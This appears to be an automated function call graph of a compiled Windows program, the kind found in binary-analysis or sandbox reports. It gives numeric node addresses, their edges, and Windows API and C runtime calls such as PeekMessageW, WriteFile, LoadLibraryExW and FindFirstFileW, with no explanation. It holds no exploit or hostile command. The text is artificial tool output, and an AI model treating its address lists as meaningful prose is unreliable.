108776->108777 108778 40f272 108777->108778 108924 469e4a 89 API calls 4 library calls 108777->108924 108778->108689 108781 40838d 108780->108781 108782 43edbd 108780->108782 108783 420db6 Mailbox 59 API calls 108781->108783 108784 408394 108783->108784 108785 4083b5 108784->108785 108925 408634 59 API calls Mailbox 108784->108925 108785->108667 108785->108676 108788 444cc3 108787->108788 108799 4109f5 108787->108799 108987 469e4a 89 API calls 4 library calls 108788->108987 108790 410cfa 108790->108698 108792 410ee4 108792->108790 108794 410ef1 108792->108794 108985 411093 331 API calls Mailbox 108794->108985 108795 410a4b PeekMessageW 108862 410a05 Mailbox 108795->108862 108797 410ef8 LockWindowUpdate DestroyWindow GetMessageW 108797->108790 108801 410f2a 108797->108801 108799->108862 108988 409e5d 60 API calls 108799->108988 108989 456349 331 API calls 108799->108989 108800 444e81 Sleep 108800->108862 108804 445c58 TranslateMessage DispatchMessageW GetMessageW 108801->108804 108802 410ce4 108802->108790 108984 411070 10 API calls Mailbox 108802->108984 108804->108804 108805 445c88 108804->108805 108805->108790 108806 410e43 PeekMessageW 108806->108862 108807 410ea5 TranslateMessage DispatchMessageW 108807->108806 108808 444d50 TranslateAcceleratorW 108808->108806 108808->108862 108809 409e5d 60 API calls 108809->108862 108810 410d13 timeGetTime 108810->108862 108811 44581f WaitForSingleObject 108814 44583c GetExitCodeProcess CloseHandle 108811->108814 108811->108862 108813 420db6 59 API calls Mailbox 108813->108862 108846 410f95 108814->108846 108815 410e5f Sleep 108848 410e70 Mailbox 108815->108848 108816 408047 59 API calls 108816->108862 108818 445af8 Sleep 108818->108848 108821 42049f timeGetTime 108821->108848 108822 410f4e timeGetTime 108986 409e5d 60 API calls 108822->108986 108825 445b8f GetExitCodeProcess 108829 445ba5 WaitForSingleObject 108825->108829 108830 445bbb CloseHandle 108825->108830 108827 485f25 110 API calls 108827->108848 108828 40b7dd 109 API calls 108828->108848 108829->108830 108829->108862 108830->108848 108833 445874 108833->108846 108834 445078 Sleep 108834->108862 108835 445c17 Sleep 108835->108862 108841 409ea0 304 API calls 108841->108862 108844 40fce0 304 API calls 108844->108862 108846->108698 108848->108821 108848->108825 108848->108827 108848->108828 108848->108833 108848->108834 108848->108835 108848->108846 108848->108862 109014 407667 108848->109014 109019 462408 60 API calls 108848->109019 109020 409e5d 60 API calls 108848->109020 109021 407de1 108848->109021 109025 4089b3 69 API calls Mailbox 108848->109025 109026 40b73c 331 API calls 108848->109026 109027 4564da 60 API calls 108848->109027 109028 465244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 108848->109028 109029 463c55 66 API calls Mailbox 108848->109029 108850 469e4a 89 API calls 108850->108862 108851 409c90 59 API calls Mailbox 108851->108862 108853 4084c0 69 API calls 108853->108862 108854 407de1 59 API calls 108854->108862 108855 45617e 59 API calls Mailbox 108855->108862 108856 4089b3 69 API calls 108856->108862 108857 4455d5 VariantClear 108857->108862 108858 456e8f 59 API calls 108858->108862 108859 44566b VariantClear 108859->108862 108860 408cd4 59 API calls Mailbox 108860->108862 108861 445419 VariantClear 108861->108862 108862->108795 108862->108800 108862->108802 108862->108806 108862->108807 108862->108808 108862->108809 108862->108810 108862->108811 108862->108813 108862->108815 108862->108816 108862->108818 108862->108822 108862->108841 108862->108844 108862->108846 108862->108848 108862->108850 108862->108851 108862->108853 108862->108854 108862->108855 108862->108856 108862->108857 108862->108858 108862->108859 108862->108860 108862->108861 108863 40b73c 304 API calls 108862->108863 108926 40e420 108862->108926 108933 40e6a0 108862->108933 108964 40f460 108862->108964 108983 4031ce IsDialogMessageW GetClassLongW 108862->108983 108990 486018 59 API calls 108862->108990 108991 469a15 59 API calls Mailbox 108862->108991 108992 45d4f2 59 API calls 108862->108992 108993 409837 108862->108993 109011 4560ef 59 API calls 2 library calls 108862->109011 109012 408401 59 API calls 108862->109012 109013 4082df 59 API calls Mailbox 108862->109013 108863->108862 108864->108722 108865->108726 108866->108720 108867->108720 108869 409ebf 108868->108869 108890 409eed Mailbox 108868->108890 108870 420db6 Mailbox 59 API calls 108869->108870 108870->108890 108871 40b47a 108875 4409e5 108871->108875 108876 440055 108871->108876 108872 40b475 108873 408047 59 API calls 108872->108873 108874 40a057 108873->108874 108874->108689 110168 469e4a 89 API calls 4 library calls 108875->110168 110165 469e4a 89 API calls 4 library calls 108876->110165 108879 420db6 59 API calls Mailbox 108879->108890 108881 440064 108881->108689 108882 422d40 67 API calls __cinit 108882->108890 108885 408047 59 API calls 108885->108890 108886 407667 59 API calls 108886->108890 108887 456e8f 59 API calls 108887->108890 108888 4409d6 110167 469e4a 89 API calls 4 library calls 108888->110167 108890->108871 108890->108872 108890->108874 108890->108876 108890->108879 108890->108882 108890->108885 108890->108886 108890->108887 108890->108888 108891 40a55a 108890->108891 110163 40c8c0 331 API calls 2 library calls 108890->110163 110164 40b900 60 API calls Mailbox 108890->110164 110166 469e4a 89 API calls 4 library calls 108891->110166 108892->108726 108893->108652 108894->108659 108895->108661 108896->108659 108897->108659 108898->108663 108899->108677 108900->108672 108901->108672 108902->108675 108903->108681 108904->108720 108905->108720 108906->108720 108907->108720 108909 4084cb 108908->108909 108911 4084f2 108909->108911 110169 4089b3 69 API calls Mailbox 108909->110169 108911->108703 108912->108659 108913->108705 108915 408052 108914->108915 108916 40805a 108914->108916 108917 407f77 59 API calls 108915->108917 108916->108713 108917->108916 108918->108715 108919->108659 108921 407e62 108920->108921 108923 407e5f _memmove 108920->108923 108922 420db6 Mailbox 59 API calls 108921->108922 108922->108923 108923->108774 108924->108778 108925->108785 108927 40e451 108926->108927 108928 40e43d 108926->108928 109031 469e4a 89 API calls 4 library calls 108927->109031 109030 40df00 331 API calls 2 library calls 108928->109030 108930 40e448 108930->108862 108932 443aa4 108932->108932 108934 40e6d5 108933->108934 108935 40e73f 108934->108935 108936 443aa9 108934->108936 108947 40e799 108934->108947 108941 407667 59 API calls 108935->108941 108935->108947 108937 409ea0 331 API calls 108936->108937 108939 443abe 108937->108939 108938 407667 59 API calls 108938->108947 108963 40e970 Mailbox 108939->108963 109036 469e4a 89 API calls 4 library calls 108939->109036 108943 443b04 108941->108943 108942 422d40 __cinit 67 API calls 108942->108947 109037 422d40 108943->109037 108944 443b26 108944->108862 108946 4084c0 69 API calls 108946->108963 108947->108938 108947->108942 108947->108944 108949 40e95a 108947->108949 108947->108963 108948 409ea0 331 API calls 108948->108963 108949->108963 109040 469e4a 89 API calls 4 library calls 108949->109040 108950 469e4a 89 API calls 108950->108963 108952 408d40 59 API calls 108952->108963 108960 443e25 108960->108862 108961 40f195 109044 469e4a 89 API calls 4 library calls 108961->109044 108962 40ea78 108962->108862 108963->108946 108963->108948 108963->108950 108963->108952 108963->108961 108963->108962 109032 407f77 108963->109032 109041 456e8f 59 API calls 108963->109041 109042 47c5c3 331 API calls 108963->109042 109043 47b53c 331 API calls Mailbox 108963->109043 109045 409c90 59 API calls Mailbox 108963->109045 109046 4793c6 331 API calls Mailbox 108963->109046 108965 40f650 108964->108965 108966 40f4ba 108964->108966 108969 407de1 59 API calls 108965->108969 108967 40f4c6 108966->108967 108968 44441e 108966->108968 109223 40f290 331 API calls 2 library calls 108967->109223 109225 47bc6b 108968->109225 108975 40f58c Mailbox 108969->108975 108972 44442c 108976 40f630 108972->108976 109265 469e4a 89 API calls 4 library calls 108972->109265 108974 40f4fd 108974->108972 108974->108975 108974->108976 109125 463c37 108975->109125 109128 404e4a 108975->109128 109134 47445a 108975->109134 109143 46cb7a 108975->109143 108976->108862 108978 40f5e3 108978->108976 109224 409c90 59 API calls Mailbox 108978->109224 108983->108862 108984->108792 108985->108797 108986->108862 108987->108799 108988->108799 108989->108799 108990->108862 108991->108862 108992->108862 108994 409851 108993->108994 108995 40984b 108993->108995 108996 43f5d3 __i64tow 108994->108996 108997 409899 108994->108997 108998 409857 __itow 108994->108998 109002 43f4da 108994->109002 108995->108862 110161 423698 83 API calls 3 library calls 108997->110161 109001 420db6 Mailbox 59 API calls 108998->109001 109003 409871 109001->109003 109004 420db6 Mailbox 59 API calls 109002->109004 109006 43f552 Mailbox _wcscpy 109002->109006 109003->108995 109005 407de1 59 API calls 109003->109005 109007 43f51f 109004->109007 109005->108995 110162 423698 83 API calls 3 library calls 109006->110162 109008 420db6 Mailbox 59 API calls 109007->109008 109009 43f545 109008->109009 109009->109006 109010 407de1 59 API calls 109009->109010 109010->109006 109011->108862 109012->108862 109013->108862 109015 420db6 Mailbox 59 API calls 109014->109015 109016 407688 109015->109016 109017 420db6 Mailbox 59 API calls 109016->109017 109018 407696 109017->109018 109018->108848 109019->108848 109020->108848 109022 407df0 __NMSG_WRITE _memmove 109021->109022 109023 420db6 Mailbox 59 API calls 109022->109023 109024 407e2e 109023->109024 109024->108848 109025->108848 109026->108848 109027->108848 109028->108848 109029->108848 109030->108930 109031->108932 109033 407f9a _memmove 109032->109033 109034 407f87 109032->109034 109033->108963 109034->109033 109035 420db6 Mailbox 59 API calls 109034->109035 109035->109033 109036->108963 109047 422c44 109037->109047 109039 422d4b 109039->108947 109040->108963 109041->108963 109042->108963 109043->108963 109044->108960 109045->108963 109046->108963 109048 422c50 __wfsopen 109047->109048 109055 423217 109048->109055 109054 422c77 __wfsopen 109054->109039 109072 429c0b 109055->109072 109057 422c59 109058 422c88 DecodePointer DecodePointer 109057->109058 109059 422c65 109058->109059 109060 422cb5 109058->109060 109069 422c82 109059->109069 109060->109059 109118 4287a4 59 API calls __wfsopen 109060->109118 109062 422d18 EncodePointer EncodePointer 109062->109059 109063 422cc7 109063->109062 109064 422cec 109063->109064 109119 428864 61 API calls 2 library calls 109063->109119 109064->109059 109067 422d06 EncodePointer 109064->109067 109120 428864 61 API calls 2 library calls 109064->109120 109067->109062 109068 422d00 109068->109059 109068->109067 109121 423220 109069->109121 109073 429c2f EnterCriticalSection 109072->109073 109074 429c1c 109072->109074 109073->109057 109079 429c93 109074->109079 109076 429c22 109076->109073 109103 4230b5 58 API calls 3 library calls 109076->109103 109080 429c9f __wfsopen 109079->109080 109081 429cc0 109080->109081 109082 429ca8 109080->109082 109091 429ce1 __wfsopen 109081->109091 109107 42881d 58 API calls 2 library calls 109081->109107 109104 42a16b 58 API calls 2 library calls 109082->109104 109084 429cad 109105 42a1c8 58 API calls 6 library calls 109084->109105 109087 429cd5 109089 429ceb 109087->109089 109090 429cdc 109087->109090 109088 429cb4 109106 42309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 109088->109106 109092 429c0b __lock 58 API calls 109089->109092 109108 428b28 58 API calls __getptd_noexit 109090->109108 109091->109076 109095 429cf2 109092->109095 109097 429d17 109095->109097 109098 429cff 109095->109098 109110 422d55 109097->109110 109109 429e2b InitializeCriticalSectionAndSpinCount 109098->109109 109101 429d0b 109116 429d33 LeaveCriticalSection _doexit 109101->109116 109104->109084 109105->109088 109107->109087 109108->109091 109109->109101 109111 422d5e RtlFreeHeap 109110->109111 109115 422d87 __dosmaperr 109110->109115 109112 422d73 109111->109112 109111->109115 109117 428b28 58 API calls __getptd_noexit 109112->109117 109114 422d79 GetLastError 109114->109115 109115->109101 109116->109091 109117->109114 109118->109063 109119->109064 109120->109068 109124 429d75 LeaveCriticalSection 109121->109124 109123 422c87 109123->109054 109124->109123 109266 46445a GetFileAttributesW 109125->109266 109129 404e54 109128->109129 109130 404e5b 109128->109130 109270 4253a6 109129->109270 109132 404e6a 109130->109132 109133 404e7b FreeLibrary 109130->109133 109132->108978 109133->109132 109135 409837 84 API calls 109134->109135 109136 474494 109135->109136 109540 406240 109136->109540 109138 4744c9 109142 4744cd 109138->109142 109565 409a98 59 API calls Mailbox 109138->109565 109139 4744a4 109139->109138 109140 409ea0 331 API calls 109139->109140 109140->109138 109142->108978 109144 407667 59 API calls 109143->109144 109145 46cbaf 109144->109145 109146 407667 59 API calls 109145->109146 109147 46cbb8 109146->109147 109148 46cbcc 109147->109148 109784 409b3c 109147->109784 109150 409837 84 API calls 109148->109150 109151 46cbe9 109150->109151 109152 46ccea 109151->109152 109153 46cc0b 109151->109153 109160 46cd1a Mailbox 109151->109160 109588 404ddd 109152->109588 109155 409837 84 API calls 109153->109155 109157 46cc17 109155->109157 109158 408047 59 API calls 109157->109158 109161 46cc23 109158->109161 109159 46cd16 109159->109160 109163 407667 59 API calls 109159->109163 109160->108978 109166 46cc37 109161->109166 109167 46cc69 109161->109167 109162 404ddd 136 API calls 109162->109159 109164 46cd4b 109163->109164 109165 407667 59 API calls 109164->109165 109168 46cd54 109165->109168 109169 408047 59 API calls 109166->109169 109170 409837 84 API calls 109167->109170 109171 407667 59 API calls 109168->109171 109173 46cc47 109169->109173 109174 46cc76 109170->109174 109172 46cd5d 109171->109172 109175 407667 59 API calls 109172->109175 109788 407cab 109173->109788 109177 408047 59 API calls 109174->109177 109179 46cd66 109175->109179 109178 46cc82 109177->109178 109795 464a31 GetFileAttributesW 109178->109795 109182 409837 84 API calls 109179->109182 109185 46cd73 109182->109185 109183 409837 84 API calls 109186 46cc5d 109183->109186 109184 46cc8b 109187 46cc9e 109184->109187 109190 4079f2 59 API calls 109184->109190 109612 40459b 109185->109612 109189 407b2e 59 API calls 109186->109189 109192 409837 84 API calls 109187->109192 109198 46cca4 109187->109198 109189->109167 109190->109187 109191 46cd8e 109663 4079f2 109191->109663 109194 46cccb 109192->109194 109796 4637ef 75 API calls Mailbox 109194->109796 109197 46cdd1 109199 408047 59 API calls 109197->109199 109198->109160 109201 46cddf 109199->109201 109200 4079f2 59 API calls 109202 46cdae 109200->109202 109666 407b2e 109201->109666 109202->109197 109797 407bcc 109202->109797 109206 407b2e 59 API calls 109208 46cdfb 109206->109208 109207 46cdc3 109209 407bcc 59 API calls 109207->109209 109210 407b2e 59 API calls 109208->109210 109209->109197 109223->108974 109224->108978 109226 47bc96 109225->109226 109227 47bcb0 109225->109227 110153 469e4a 89 API calls 4 library calls 109226->110153 110154 47a213 59 API calls Mailbox 109227->110154 109230 47bcbb 109231 409ea0 330 API calls 109230->109231 109232 47bd1c 109231->109232 109233 47bdae 109232->109233 109236 47bd5d 109232->109236 109258 47bca8 Mailbox 109232->109258 109234 47be04 109233->109234 109235 47bdb4 109233->109235 109237 409837 84 API calls 109234->109237 109234->109258 110156 46791a 59 API calls 109235->110156 110155 4672df 59 API calls Mailbox 109236->110155 109238 47be16 109237->109238 109241 407e4f 59 API calls 109238->109241 109245 47be3a CharUpperBuffW 109241->109245 109242 47bdd7 110157 405d41 59 API calls Mailbox 109242->110157 109244 47bd8d 109247 40f460 330 API calls 109244->109247 109248 47be54 109245->109248 109246 47bddf Mailbox 109251 40fce0 330 API calls 109246->109251 109247->109258 109249 47bea7 109248->109249 109250 47be5b 109248->109250 109252 409837 84 API calls 109249->109252 110158 4672df 59 API calls Mailbox 109250->110158 109251->109258 109253 47beaf 109252->109253 110159 409e5d 60 API calls 109253->110159 109256 47be89 109257 40f460 330 API calls 109256->109257 109257->109258 109258->108972 109259 47beb9 109259->109258 109260 409837 84 API calls 109259->109260 109261 47bed4 109260->109261 110160 405d41 59 API calls Mailbox 109261->110160 109263 47bee4 109264 40fce0 330 API calls 109263->109264 109264->109258 109265->108976 109267 463c3e 109266->109267 109268 464475 FindFirstFileW 109266->109268 109267->108978 109268->109267 109269 46448a FindClose 109268->109269 109269->109267 109271 4253b2 __wfsopen 109270->109271 109272 4253c6 109271->109272 109273 4253de 109271->109273 109305 428b28 58 API calls __getptd_noexit 109272->109305 109276 4253d6 __wfsopen 109273->109276 109283 426c11 109273->109283 109275 4253cb 109306 428db6 9 API calls __wfsopen 109275->109306 109276->109130 109284 426c43 EnterCriticalSection 109283->109284 109285 426c21 109283->109285 109287 4253f0 109284->109287 109285->109284 109286 426c29 109285->109286 109288 429c0b __lock 58 API calls 109286->109288 109289 42533a 109287->109289 109288->109287 109290 425349 109289->109290 109291 42535d 109289->109291 109351 428b28 58 API calls __getptd_noexit 109290->109351 109292 425359 109291->109292 109308 424a3d 109291->109308 109307 425415 LeaveCriticalSection LeaveCriticalSection _fseek 109292->109307 109295 42534e 109352 428db6 9 API calls __wfsopen 109295->109352 109301 425377 109325 430a02 109301->109325 109303 42537d 109303->109292 109304 422d55 _free 58 API calls 109303->109304 109304->109292 109305->109275 109306->109276 109307->109276 109309 424a50 109308->109309 109313 424a74 109308->109313 109310 4246e6 __fclose_nolock 58 API calls 109309->109310 109309->109313 109311 424a6d 109310->109311 109353 42d886 109311->109353 109314 430b77 109313->109314 109315 425371 109314->109315 109316 430b84 109314->109316 109318 4246e6 109315->109318 109316->109315 109317 422d55 _free 58 API calls 109316->109317 109317->109315 109319 4246f0 109318->109319 109320 424705 109318->109320 109495 428b28 58 API calls __getptd_noexit 109319->109495 109320->109301 109322 4246f5 109496 428db6 9 API calls __wfsopen 109322->109496 109324 424700 109324->109301 109326 430a0e __wfsopen 109325->109326 109327 430a32 109326->109327 109328 430a1b 109326->109328 109330 430abd 109327->109330 109332 430a42 109327->109332 109512 428af4 58 API calls __getptd_noexit 109328->109512 109517 428af4 58 API calls __getptd_noexit 109330->109517 109331 430a20 109513 428b28 58 API calls __getptd_noexit 109331->109513 109335 430a60 109332->109335 109336 430a6a 109332->109336 109514 428af4 58 API calls __getptd_noexit 109335->109514 109340 42d206 ___lock_fhandle 59 API calls 109336->109340 109337 430a65 109518 428b28 58 API calls __getptd_noexit 109337->109518 109338 430a27 __wfsopen 109338->109303 109342 430a70 109340->109342 109344 430a83 109342->109344 109345 430a8e 109342->109345 109343 430ac9 109519 428db6 9 API calls __wfsopen 109343->109519 109497 430add 109344->109497 109515 428b28 58 API calls __getptd_noexit 109345->109515 109349 430a89 109516 430ab5 LeaveCriticalSection __unlock_fhandle 109349->109516 109351->109295 109352->109292 109354 42d892 __wfsopen 109353->109354 109355 42d8b6 109354->109355 109356 42d89f 109354->109356 109358 42d955 109355->109358 109360 42d8ca 109355->109360 109454 428af4 58 API calls __getptd_noexit 109356->109454 109460 428af4 58 API calls __getptd_noexit 109358->109460 109359 42d8a4 109455 428b28 58 API calls __getptd_noexit 109359->109455 109363 42d8f2 109360->109363 109364 42d8e8 109360->109364 109381 42d206 109363->109381 109456 428af4 58 API calls __getptd_noexit 109364->109456 109365 42d8ed 109461 428b28 58 API calls __getptd_noexit 109365->109461 109366 42d8ab __wfsopen 109366->109313 109369 42d8f8 109371 42d90b 109369->109371 109372 42d91e 109369->109372 109390 42d975 109371->109390 109457 428b28 58 API calls __getptd_noexit 109372->109457 109373 42d961 109462 428db6 9 API calls __wfsopen 109373->109462 109377 42d917 109459 42d94d LeaveCriticalSection __unlock_fhandle 109377->109459 109378 42d923 109458 428af4 58 API calls __getptd_noexit 109378->109458 109382 42d212 __wfsopen 109381->109382 109383 42d261 EnterCriticalSection 109382->109383 109385 429c0b __lock 58 API calls 109382->109385 109384 42d287 __wfsopen 109383->109384 109384->109369 109386 42d237 109385->109386 109387 42d24f 109386->109387 109463 429e2b InitializeCriticalSectionAndSpinCount 109386->109463 109464 42d28b LeaveCriticalSection _doexit 109387->109464 109391 42d982 __ftell_nolock 109390->109391 109392 42d9e0 109391->109392 109393 42d9c1 109391->109393 109424 42d9b6 109391->109424 109396 42da1c 109392->109396 109399 42da38 109392->109399 109474 428af4 58 API calls __getptd_noexit 109393->109474 109477 428af4 58 API calls __getptd_noexit 109396->109477 109397 42e1d6 109397->109377 109398 42d9c6 109475 428b28 58 API calls __getptd_noexit 109398->109475 109402 42da51 109399->109402 109480 4318c1 60 API calls 3 library calls 109399->109480 109465 435c6b 109402->109465 109403 42da21 109478 428b28 58 API calls __getptd_noexit 109403->109478 109404 42d9cd 109476 428db6 9 API calls __wfsopen 109404->109476 109409 42da5f 109411 42ddb8 109409->109411 109481 4299ac 58 API calls 2 library calls 109409->109481 109410 42da28 109479 428db6 9 API calls __wfsopen 109410->109479 109412 42ddd6 109411->109412 109413 42e14b WriteFile 109411->109413 109416 42defa 109412->109416 109422 42ddec 109412->109422 109417 42ddab GetLastError 109413->109417 109426 42dd78 109413->109426 109428 42dfef 109416->109428 109430 42df05 109416->109430 109417->109426 109418 42da8b GetConsoleMode 109418->109411 109420 42daca 109418->109420 109419 42e184 109419->109424 109486 428b28 58 API calls __getptd_noexit 109419->109486 109420->109411 109421 42dada GetConsoleCP 109420->109421 109421->109419 109451 42db09 109421->109451 109422->109419 109423 42de5b WriteFile 109422->109423 109423->109417 109429 42de98 109423->109429 109488 42c5f6 109424->109488 109426->109419 109426->109424 109427 42ded8 109426->109427 109432 42dee3 109427->109432 109433 42e17b 109427->109433 109428->109419 109434 42e064 WideCharToMultiByte 109428->109434 109429->109422 109435 42debc 109429->109435 109430->109419 109436 42df6a WriteFile 109430->109436 109431 42e1b2 109487 428af4 58 API calls __getptd_noexit 109431->109487 109483 428b28 58 API calls __getptd_noexit 109432->109483 109485 428b07 58 API calls 3 library calls 109433->109485 109434->109417 109447 42e0ab 109434->109447 109435->109426 109436->109417 109440 42dfb9 109436->109440 109440->109426 109440->109430 109440->109435 109441 42dee8 109484 428af4 58 API calls __getptd_noexit 109441->109484 109442 42e0b3 WriteFile 109445 42e106 GetLastError 109442->109445 109442->109447 109445->109447 109446 4362ba 60 API calls __write_nolock 109446->109451 109447->109426 109447->109428 109447->109435 109447->109442 109448 437a5e WriteConsoleW CreateFileW __putwch_nolock 109452 42dc5f 109448->109452 109449 42dbf2 WideCharToMultiByte 109449->109426 109450 42dc2d WriteFile 109449->109450 109450->109417 109450->109452 109451->109426 109451->109446 109451->109449 109451->109452 109482 4235f5 58 API calls __isleadbyte_l 109451->109482 109452->109417 109452->109426 109452->109448 109452->109451 109453 42dc87 WriteFile 109452->109453 109453->109417 109453->109452 109454->109359 109455->109366 109456->109365 109457->109378 109458->109377 109459->109366 109460->109365 109461->109373 109462->109366 109463->109387 109464->109383 109466 435c76 109465->109466 109468 435c83 109465->109468 109467 428b28 __wfsopen 58 API calls 109466->109467 109469 435c7b 109467->109469 109470 435c8f 109468->109470 109471 428b28 __wfsopen 58 API calls 109468->109471 109469->109409 109470->109409 109472 435cb0 109471->109472 109473 428db6 __wfsopen 9 API calls 109472->109473 109473->109469 109474->109398 109475->109404 109476->109424 109477->109403 109478->109410 109479->109424 109480->109402 109481->109418 109482->109451 109483->109441 109484->109424 109485->109424 109486->109431 109487->109424 109489 42c600 IsProcessorFeaturePresent 109488->109489 109490 42c5fe 109488->109490 109492 43590a 109489->109492 109490->109397 109493 4358b9 ___raise_securityfailure 5 API calls 109492->109493 109494 4359ed 109493->109494 109494->109397 109495->109322 109496->109324 109520 42d4c3 109497->109520 109499 430b41 109533 42d43d 59 API calls 2 library calls 109499->109533 109501 430aeb 109501->109499 109504 42d4c3 __lseek_nolock 58 API calls 109501->109504 109511 430b1f 109501->109511 109502 42d4c3 __lseek_nolock 58 API calls 109506 430b2b CloseHandle 109502->109506 109503 430b49 109510 430b6b 109503->109510 109534 428b07 58 API calls 3 library calls 109503->109534 109505 430b16 109504->109505 109507 42d4c3 __lseek_nolock 58 API calls 109505->109507 109506->109499 109508 430b37 GetLastError 109506->109508 109507->109511 109508->109499 109510->109349 109511->109499 109511->109502 109512->109331 109513->109338 109514->109337 109515->109349 109516->109338 109517->109337 109518->109343 109519->109338 109521 42d4e3 109520->109521 109522 42d4ce 109520->109522 109526 42d508 109521->109526 109537 428af4 58 API calls __getptd_noexit 109521->109537 109535 428af4 58 API calls __getptd_noexit 109522->109535 109525 42d4d3 109536 428b28 58 API calls __getptd_noexit 109525->109536 109526->109501 109527 42d512 109538 428b28 58 API calls __getptd_noexit 109527->109538 109530 42d51a 109539 428db6 9 API calls __wfsopen 109530->109539 109531 42d4db 109531->109501 109533->109503 109534->109510 109535->109525 109536->109531 109537->109527 109538->109530 109539->109531 109566 407a16 109540->109566 109542 40646a 109573 40750f 109542->109573 109544 406484 Mailbox 109544->109139 109547 407d8c 59 API calls 109561 406265 109547->109561 109548 40750f 59 API calls 109548->109561 109549 43dff6 109586 45f8aa 91 API calls 4 library calls 109549->109586 109553 43e004 109554 40750f 59 API calls 109553->109554 109556 43e01a 109554->109556 109555 406799 _memmove 109587 45f8aa 91 API calls 4 library calls 109555->109587 109556->109544 109557 43df92 109583 408029 109557->109583 109560 43df9d 109564 420db6 Mailbox 59 API calls 109560->109564 109561->109542 109561->109547 109561->109548 109561->109549 109561->109555 109561->109557 109562 407e4f 59 API calls 109561->109562 109571 405f6c 60 API calls 109561->109571 109572 405d41 59 API calls Mailbox 109561->109572 109581 405e72 60 API calls 109561->109581 109582 407924 59 API calls 2 library calls 109561->109582 109563 40643b CharUpperBuffW 109562->109563 109563->109561 109564->109555 109565->109142 109567 420db6 Mailbox 59 API calls 109566->109567 109568 407a3b 109567->109568 109569 408029 59 API calls 109568->109569 109570 407a4a 109569->109570 109570->109561 109571->109561 109572->109561 109574 4075af 109573->109574 109579 407522 _memmove 109573->109579 109576 420db6 Mailbox 59 API calls 109574->109576 109575 420db6 Mailbox 59 API calls 109577 407529 109575->109577 109576->109579 109578 420db6 Mailbox 59 API calls 109577->109578 109580 407552 109577->109580 109578->109580 109579->109575 109580->109544 109581->109561 109582->109561 109584 420db6 Mailbox 59 API calls 109583->109584 109585 408033 109584->109585 109585->109560 109586->109553 109587->109544 109806 404bb5 109588->109806 109593 43d8e6 109596 404e4a 84 API calls 109593->109596 109594 404e08 LoadLibraryExW 109816 404b6a 109594->109816 109598 43d8ed 109596->109598 109600 404b6a 3 API calls 109598->109600 109602 43d8f5 109600->109602 109601 404e2f 109601->109602 109603 404e3b 109601->109603 109842 404f0b 109602->109842 109604 404e4a 84 API calls 109603->109604 109606 404e40 109604->109606 109606->109159 109606->109162 109609 43d91c 109850 404ec7 109609->109850 109613 407667 59 API calls 109612->109613 109614 4045b1 109613->109614 109615 407667 59 API calls 109614->109615 109616 4045b9 109615->109616 109617 407667 59 API calls 109616->109617 109618 4045c1 109617->109618 109619 407667 59 API calls 109618->109619 109620 4045c9 109619->109620 109621 43d4d2 109620->109621 109622 4045fd 109620->109622 109623 408047 59 API calls 109621->109623 109624 40784b 59 API calls 109622->109624 109625 43d4db 109623->109625 109626 40460b 109624->109626 110036 407d8c 109625->110036 110032 407d2c 109626->110032 109629 404615 109630 404640 109629->109630 109631 40784b 59 API calls 109629->109631 109633 40465f 109630->109633 109646 404680 109630->109646 109648 43d4fb 109630->109648 109634 404636 109631->109634 109638 4079f2 59 API calls 109633->109638 109637 407d2c 59 API calls 109634->109637 109635 404691 109639 4046a3 109635->109639 109642 408047 59 API calls 109635->109642 109636 43d5cb 109640 407bcc 59 API calls 109636->109640 109637->109630 109641 404669 109638->109641 109643 4046b3 109639->109643 109644 408047 59 API calls 109639->109644 109658 43d588 109640->109658 109645 40784b 59 API calls 109641->109645 109641->109646 109642->109639 109647 408047 59 API calls 109643->109647 109649 4046ba 109643->109649 109644->109643 109645->109646 110019 40784b 109646->110019 109647->109649 109648->109636 109650 43d5b4 109648->109650 109656 43d532 109648->109656 109651 408047 59 API calls 109649->109651 109660 4046c1 Mailbox 109649->109660 109650->109636 109652 43d59f 109650->109652 109651->109660 109655 407bcc 59 API calls 109652->109655 109653 43d590 109654 407bcc 59 API calls 109653->109654 109654->109658 109655->109658 109656->109653 109661 43d57b 109656->109661 109657 4079f2 59 API calls 109657->109658 109658->109646 109658->109657 110040 407924 59 API calls 2 library calls 109658->110040 109660->109191 109662 407bcc 59 API calls 109661->109662 109662->109658 109664 407e4f 59 API calls 109663->109664 109665 4079fd 109664->109665 109665->109197 109665->109200 109667 407b40 109666->109667 109668 43ec6b 109666->109668 110045 407a51 109667->110045 110051 457bdb 59 API calls _memmove 109668->110051 109671 407b4c 109671->109206 109672 43ec75 109673 408047 59 API calls 109672->109673 109674 43ec7d Mailbox 109673->109674 109785 409b4d 109784->109785 109786 409b52 109784->109786 109785->109786 110147 42358a 59 API calls 109785->110147 109786->109148 109789 43ed4a 109788->109789 109790 407cbf 109788->109790 109792 408029 59 API calls 109789->109792 110148 407c50 109790->110148 109794 43ed55 __NMSG_WRITE _memmove 109792->109794 109793 407cca 109793->109183 109795->109184 109796->109198 109798 407c45 109797->109798 109799 407bd8 __NMSG_WRITE 109797->109799 109800 407d2c 59 API calls 109798->109800 109801 407c13 109799->109801 109802 407bee 109799->109802 109805 407bf6 _memmove 109800->109805 109803 408029 59 API calls 109801->109803 109804 407f27 59 API calls 109802->109804 109803->109805 109804->109805 109805->109207 109855 404c03 109806->109855 109809 404bdc 109811 404bf5 109809->109811 109812 404bec FreeLibrary 109809->109812 109810 404c03 2 API calls 109810->109809 109813 42525b 109811->109813 109812->109811 109859 425270 109813->109859 109815 404dfc 109815->109593 109815->109594 109940 404c36 109816->109940 109819 404b8f 109821 404ba1 FreeLibrary 109819->109821 109822 404baa 109819->109822 109820 404c36 2 API calls 109820->109819 109821->109822 109823 404c70 109822->109823 109824 420db6 Mailbox 59 API calls 109823->109824 109825 404c85 109824->109825 109944 40522e 109825->109944 109827 404c91 _memmove 109828 404dc1 109827->109828 109829 404d89 109827->109829 109833 404ccc 109827->109833 109958 46991b 95 API calls 109828->109958 109947 404e89 CreateStreamOnHGlobal 109829->109947 109830 404ec7 69 API calls 109839 404cd5 109830->109839 109833->109830 109834 404f0b 74 API calls 109834->109839 109835 404d69 109835->109601 109837 43d8a7 109838 404ee5 85 API calls 109837->109838 109840 43d8bb 109838->109840 109839->109834 109839->109835 109839->109837 109953 404ee5 109839->109953 109841 404f0b 74 API calls 109840->109841 109841->109835 109843 404f1d 109842->109843 109844 43d9cd 109842->109844 109976 4255e2 109843->109976 109847 469109 109996 468f5f 109847->109996 109849 46911f 109849->109609 109851 43d990 109850->109851 109852 404ed6 109850->109852 110001 425c60 109852->110001 109854 404ede 109856 404bd0 109855->109856 